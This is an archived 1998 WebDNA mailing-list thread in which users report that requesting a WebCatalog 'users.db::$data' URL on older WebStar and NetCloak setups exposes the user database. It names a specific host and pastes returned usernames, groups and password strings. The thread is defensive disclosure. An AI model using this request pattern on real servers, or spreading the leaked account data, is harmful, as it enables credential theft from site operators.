Re: Major Security Hole
This WebDNA talk-list message is from 1998
It keeps the original formatting.
numero = 18825
interpreted = N
texte = Dan,Yours appear to be encrypted.Paul>Oh crap! I get someting similar I can see all of my groups and user>names but the passwords appear as a string of weird characters. Now I>don't know if the characters can be interpreted or if it is just garbage.>I would prefer that nothing gets returned.>>I get the user group text string returned if I request:>>http://www.server.com/webcatalog/users.db::$data>>I also get the text string returned if I only request:>>http://www.server.com/webcatalog/users.db:>>>Here is the complete string that gets returned:>user pass groups ADMIN m&%22#022#!#027#h ADMIN UPDATEDONE>ZcMNv#027#TEIh DAN TRYON -e%2C #004#Tw{ ADMIN,RSKILLS,CESD>GEOFF FULLER>*QKV#031##026#u#%00 RSKILLS,CESD CARL HADSELL ]%22D7pFx 2̻M>RSKILLS,CESD>>>I run a mac - webstar 2.1 and netcloak>I do NOT allow all webcatalog commands!>>>dan t.>>>>>>>>>>I thought that the $ was the problem too at first. But then it worked>>with just a single :>>>>It worked on .db files which allowed ANYONE to find and look at our>>users.db file. OUCH!>>>>I tried to do the same thing on the Pacific-Coast server and that of>>several others that I know run WebCat or Typhoon, including some of our>>other servers here. It only was valid in the one instance on this machine>>that we were still running Webstar 2.0 on along with Netcloak. I upgraded>>WebStar to 2.1 and deleted Netcloak.>>>>Problem solved. But I sure was in a panic when I could type>>http://secure.ims1.com/webcatalog/users.db::$data and get a complete list>>of users, passwords and groups!>>>>Anyone who is still using WebStar 2.0, Netcloak and WebCatalog 2.0 on a>>Macintosh should be made aware that their setup may not be secure. People>>can get your admin passwords and then track down any credit card numbers>>from online stores. I am not sure if this is a problem with WebStar or>>Netcloak, but I am sure that the problem is real and it does not exist with>>NetCloak removed and Webstar updated to 2.1 or greater.>>>>Thanks, Paul>>>>>>>>>> _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_>> _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_>> _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_>> _/_/_/ Business -
_\_\_\_\_\_\_\_\_\_\_>> _/_/_/ Real Estate - _\_\_\_\_>> _/_/_/Websites - Children _/ _\_\_\_>>_/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_>>>>>> _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_ _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_ _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_ _/_/_/ Business - _\_\_\_\_\_\_\_\_\_\_ _/_/_/ Real Estate - _\_\_\_\_ _/_/_/Websites - Children _/ _\_\_\__/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Associated Messages, from the most recent to the oldest:
Dan,Yours appear to be encrypted.Paul>Oh crap! I get someting similar I can see all of my groups and user>names but the passwords appear as a string of weird characters. Now I>don't know if the characters can be interpreted or if it is just garbage.>I would prefer that nothing gets returned.>>I get the user group text string returned if I request:>>http://www.server.com/webcatalog/users.db::$data>>I also get the text string returned if I only request:>>http://www.server.com/webcatalog/users.db:>>>Here is the complete string that gets returned:>user pass groups ADMIN m&%22#022#!#027#h ADMIN UPDATEDONE>ZcMNv#027#TEIh DAN TRYON -e%2C #004#Tw{ ADMIN,RSKILLS,CESD>GEOFF FULLER>*QKV#031##026#u#%00 RSKILLS,CESD CARL HADSELL ]%22D7pFx 2̻M>RSKILLS,CESD>>>I run a mac - webstar 2.1 and netcloak>I do NOT allow all webcatalog commands!>>>dan t.>>>>>>>>>>I thought that the $ was the problem too at first. But then it worked>>with just a single :>>>>It worked on .db files which allowed ANYONE to find and look at our>>users.db file. OUCH!>>>>I tried to do the same thing on the Pacific-Coast server and that of>>several others that I know run WebCat or Typhoon, including some of our>>other servers here. It only was valid in the one instance on this machine>>that we were still running Webstar 2.0 on along with Netcloak. I upgraded>>WebStar to 2.1 and deleted Netcloak.>>>>Problem solved. But I sure was in a panic when I could type>>http://secure.ims1.com/webcatalog/users.db::$data and get a complete list>>of users, passwords and groups!>>>>Anyone who is still using WebStar 2.0, Netcloak and WebCatalog 2.0 on a>>Macintosh should be made aware that their setup may not be secure. People>>can get your admin passwords and then track down any credit card numbers>>from online stores. I am not sure if this is a problem with WebStar or>>Netcloak, but I am sure that the problem is real and it does not exist with>>NetCloak removed and Webstar updated to 2.1 or greater.>>>>Thanks, Paul>>>>>>>>>> _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_>> _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_>> _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_>> _/_/_/ Business - _\_\_\_\_\_\_\_\_\_\_>> _/_/_/ Real Estate - _\_\_\_\_>> _/_/_/Websites - Children _/ _\_\_\_>>_/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_>>>>>> _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_ _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_ _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_ _/_/_/ Business - _\_\_\_\_\_\_\_\_\_\_ _/_/_/ Real Estate - _\_\_\_\_ _/_/_/Websites - Children _/ _\_\_\__/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Paul Uttermohlen
DOWNLOAD WEBDNA NOW!
Top Articles:
Talk List
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...
Related Readings:
access denied problem (1997)
two part electronic product (1998)
refreshing IE with posted .tmpl (1997)
Counting downloads (1998)
[OT] Ratings comparison? (2003)
Emailer (1997)
Parse question (2005)
Secure Server (1997)
Orderfile Info is Dissappearing (1998)
What am I missing (1997)
(2000)
[OT] ISP Windows program (2005)
move files (2000)
Standardize Address :: USPS (2005)
Emailer (1997)
Search: Is this possible? (2005)
WebCat2b13 Command Reference Doc error (1997)
ISAPI Filter (2002)
' add to cart ' or ' sku ' problem (1998)
WebCat & WebTen (1997)